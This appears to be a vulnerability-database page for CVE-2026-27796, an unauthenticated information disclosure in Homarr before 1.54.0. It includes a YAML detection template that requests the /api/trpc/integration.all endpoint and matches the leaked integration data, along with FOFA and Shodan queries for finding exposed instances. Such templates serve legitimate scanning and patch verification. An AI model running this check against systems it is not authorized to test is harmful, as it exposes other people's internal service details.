/Vulnerability Library

Homarr < 1.54.0 - Information Disclosure

CVE-2026-27796
Early Release

Description

Homarr < 1.54.0 contains an information disclosure caused by the integration.all tRPC endpoint being exposed as a publicProcedure, letting unauthenticated users retrieve sensitive integration metadata, exploit requires no authentication.

Severity

Medium

CVSS Score

5.3

Exploit Probability

1%

Affected Product

homarr

Published Date

August 8, 2026

Template Author

str4k3r

CVE-2026-27796.yaml
id: CVE-2026-27796

info:
  name: Homarr < 1.54.0 - Information Disclosure
  author: str4k3r
  severity: medium
  description: |
    Homarr < 1.54.0 contains an information disclosure caused by the integration.all tRPC endpoint being exposed as a publicProcedure, letting unauthenticated users retrieve sensitive integration metadata, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access sensitive integration metadata, potentially exposing internal service details.
  remediation: |
    Update to version 1.54.0 or later.
  reference:
    - https://github.com/homarr-labs/homarr/security/advisories/GHSA-m4vc-4prp-cvp7
    - https://github.com/homarr-labs/homarr/commit/91fc5a5c747121475a50f2713d571ceb89e95257
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27796
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-27796
    epss-score: 0.0107
    epss-percentile: 0.62282
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 1
    vendor: homarr-labs
    product: homarr
    fofa-query: title="Homarr"
    shodan-query: http.title:"Homarr"
  tags: cve,cve2026,homarr,exposure,unauth

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/trpc/integration.all"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: body
        words:
          - '"result":{"data":{"json":'
          - '"kind":"'
        condition: and

      - type: word
        part: body
        words:
          - "UNAUTHORIZED"
        negative: true
# digest: 4a0a004730450220040e005290af0a5a444c67dee73c33bb1018fb4c1a153b6fd5ace092395b4dc3022100cddb5f3ba338a766fd8b235f5b4dd0e7bf4ffaa742de2efd6761c7a582ed82e4:922c64590222798bb761d5b6d8e72950
5.3Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
CVE ID:
cve-2026-27796
CWE ID:
cwe-200

References

https://github.com/homarr-labs/homarr/security/advisories/GHSA-m4vc-4prp-cvp7https://github.com/homarr-labs/homarr/commit/91fc5a5c747121475a50f2713d571ceb89e95257https://nvd.nist.gov/vuln/detail/CVE-2026-27796

Remediation Steps

Update to version 1.54.0 or later.